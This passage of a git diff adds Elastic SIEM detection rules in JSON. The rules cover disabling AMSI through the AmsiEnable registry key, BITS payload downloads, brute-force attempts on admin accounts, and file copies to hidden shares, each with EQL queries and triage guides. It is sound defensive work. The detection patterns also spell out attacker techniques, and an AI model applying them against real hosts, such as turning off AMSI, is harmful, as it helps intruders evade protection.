infections.\n\n### Related rules\n\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Delete or set the key to its default value.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n registry.path : (\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows Script\\\\Settings\\\\AmsiEnable\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows Script\\\\Settings\\\\AmsiEnable\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows Script\\\\Settings\\\\AmsiEnable\"\n ) and\n registry.data.strings: (\"0\", \"0x00000000\")\n", + "references": [ + "https://hackinparis.com/data/slides/2019/talks/HIP2019-Dominic_Chell-Cracking_The_Perimeter_With_Sharpshooter.pdf", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f874315d-5188-4b4a-8521-d1c73093a7e4", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "f874315d-5188-4b4a-8521-d1c73093a7e4_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_110.json b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_110.json new file mode 100644 index 00000000000..523cadcba18 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_110.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modifications of the AmsiEnable registry key to 0, which disables the Antimalware Scan Interface (AMSI). An adversary can modify this key to disable AMSI protections.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Modification of AmsiEnable Registry Key", + "note": "## Triage and analysis\n\n### Investigating Modification of AmsiEnable Registry Key\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nSince AMSI is widely used across security products for increased visibility, attackers can disable it to evade detections that rely on it.\n\nThis rule monitors the modifications to the Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable registry key.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Retrieve scripts or Microsoft Office files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences on other hosts.\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Related rules\n\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Delete or set the key to its default value.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n registry.path : (\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows Script\\\\Settings\\\\AmsiEnable\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows Script\\\\Settings\\\\AmsiEnable\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows Script\\\\Settings\\\\AmsiEnable\"\n ) and\n registry.data.strings: (\"0\", \"0x00000000\")\n", + "references": [ + "https://hackinparis.com/data/slides/2019/talks/HIP2019-Dominic_Chell-Cracking_The_Perimeter_With_Sharpshooter.pdf", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f874315d-5188-4b4a-8521-d1c73093a7e4", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "f874315d-5188-4b4a-8521-d1c73093a7e4_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_7.json b/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_7.json new file mode 100644 index 00000000000..e119804a1f6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_7.json @@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies downloads of executable and archive files via the Windows Background Intelligent Transfer Service (BITS). Adversaries could leverage Windows BITS transfer jobs to download remote payloads.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Ingress Transfer via Windows BITS", + "note": "## Triage and analysis\n\n### Investigating Ingress Transfer via Windows BITS\n\nWindows Background Intelligent Transfer Service (BITS) is a technology that allows the transfer of files between a client and a server, which makes it a dual-use mechanism, being used by both legitimate apps and attackers. When malicious applications create BITS jobs, files are downloaded or uploaded in the context of the service host process, which can bypass security protections, and it helps to obscure which application requested the transfer.\n\nThis rule identifies such abuse by monitoring for file renaming events involving \"svchost.exe\" and \"BIT*.tmp\" on Windows systems.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Gain context into the BITS transfer.\n - Try to determine the process that initiated the BITS transfer.\n - Search `bitsadmin.exe` processes and examine their command lines.\n - Look for unusual processes loading `Bitsproxy.dll` and other BITS-related DLLs.\n - Try to determine the origin of the file.\n - Inspect network connections initiated by `svchost.exe`.\n - Inspect `Microsoft-Windows-Bits-Client/Operational` Windows logs, specifically the event ID 59, for unusual events.\n - Velociraptor can be used to extract these entries using the [bitsadmin artifact](https://docs.velociraptor.app/exchange/artifacts/pages/bitsadmin/).\n - Check the reputation of the remote server involved in the BITS transfer, such as its IP address or domain, using threat intelligence platforms or online reputation services.\n - Check if the domain is newly registered or unexpected.\n - Use the identified domain as an indicator of compromise (IoCs) to scope other compromised hosts in the environment.\n - [BitsParser](https://github.com/fireeye/BitsParser) can be used to parse BITS database files to extract BITS job information.\n- Examine the details of the dropped file, and whether it was executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the involved executables using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n\n### False positive analysis\n\n- Known false positives for the rule include legitimate software and system updates that use BITS for downloading files.\n\n### Related Rules\n\n- Persistence via BITS Job Notify Cmdline - c3b915e0-22f3-4bf7-991d-b643513c722f\n- Unsigned BITS Service Client Process - 9a3884d0-282d-45ea-86ce-b9c81100f026\n- Bitsadmin Activity - 8eec4df1-4b4b-4502-b6c3-c788714604c9\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restore the affected system to its operational state by applying any necessary patches, updates, or configuration changes.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.action == \"rename\" and\n process.name : \"svchost.exe\" and file.Ext.original.name : \"BIT*.tmp\" and \n (file.extension : (\"exe\", \"zip\", \"rar\", \"bat\", \"dll\", \"ps1\", \"vbs\", \"wsh\", \"js\", \"vbe\", \"pif\", \"scr\", \"cmd\", \"cpl\") or\n file.Ext.header_bytes : \"4d5a*\") and \n \n /* noisy paths, for hunting purposes you can use the same query without the following exclusions */\n not file.path : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Windows\\\\*\", \"?:\\\\ProgramData\\\\*\\\\*\") and \n \n /* lot of third party SW use BITS to download executables with a long file name */\n not length(file.name) > 30 and\n not file.path : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp*\\\\wct*.tmp\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Adobe\\\\ARM\\\\*\\\\RdrServicesUpdater*.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Adobe\\\\ARM\\\\*\\\\AcroServicesUpdater2_x64.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Docker Desktop Installer\\\\update-*.exe\"\n )\n", + "references": [ + "https://attack.mitre.org/techniques/T1197/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.header_bytes", + "type": "unknown" + }, + { + "ecs": false, + "name": "file.Ext.original.name", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "f95972d3-c23b-463b-89a8-796b3f369b49", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Command and Control", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1197", + "name": "BITS Jobs", + "reference": "https://attack.mitre.org/techniques/T1197/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "f95972d3-c23b-463b-89a8-796b3f369b49_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_9.json b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_9.json new file mode 100644 index 00000000000..dbcec091aa2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_9.json @@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies multiple consecutive logon failures targeting an Admin account from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.security*", + "logs-windows.forwarded*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Privileged Account Brute Force", + "note": "## Triage and analysis\n\n### Investigating Privileged Account Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against an account that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where event.action == \"logon-failed\" and winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and user.name : \"*admin*\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.computer_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.Status", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "f9790abf-bd0c-45f9-8b5f-d0b74015e029", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 9 + }, + "id": "f9790abf-bd0c-45f9-8b5f-d0b74015e029_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_108.json b/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_108.json new file mode 100644 index 00000000000..453667cd7d3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_108.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Copy to a Hidden Share", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n process.name : (\"cmd.exe\", \"powershell.exe\", \"xcopy.exe\") and\n process.args : (\"copy*\", \"move*\", \"cp\", \"mv\") or\n process.name : \"robocopy.exe\"\n ) and process.args : \"*\\\\\\\\*\\\\*$*\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "fa01341d-6662-426b-9d0c-6d81e33c8a9d", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.002", + "name": "SMB/Windows Admin Shares", + "reference": "https://attack.mitre.org/techniques/T1021/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "fa01341d-6662-426b-9d0c-6d81e33c8a9d_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_109.json b/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_109.json new file mode 100644 index 00000000000..35b63ad898a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_109.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Copy to a Hidden Share", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n process.name : (\"cmd.exe\", \"powershell.exe\", \"xcopy.exe\") and\n process.args : (\"copy*\", \"move*\", \"cp\", \"mv\") or\n process.name : \"robocopy.exe\"\n ) and process.args : \"*\\\\\\\\*\\\\*$*\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "fa01341d-6662-426b-9d0c-6d81e33c8a9d", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.002", + "name": "SMB/Windows Admin Shares", + "reference": "https://attack.mitre.org/techniques/T1021/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "fa01341d-6662-426b-9d0c-6d81e33c8a9d_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_6.json 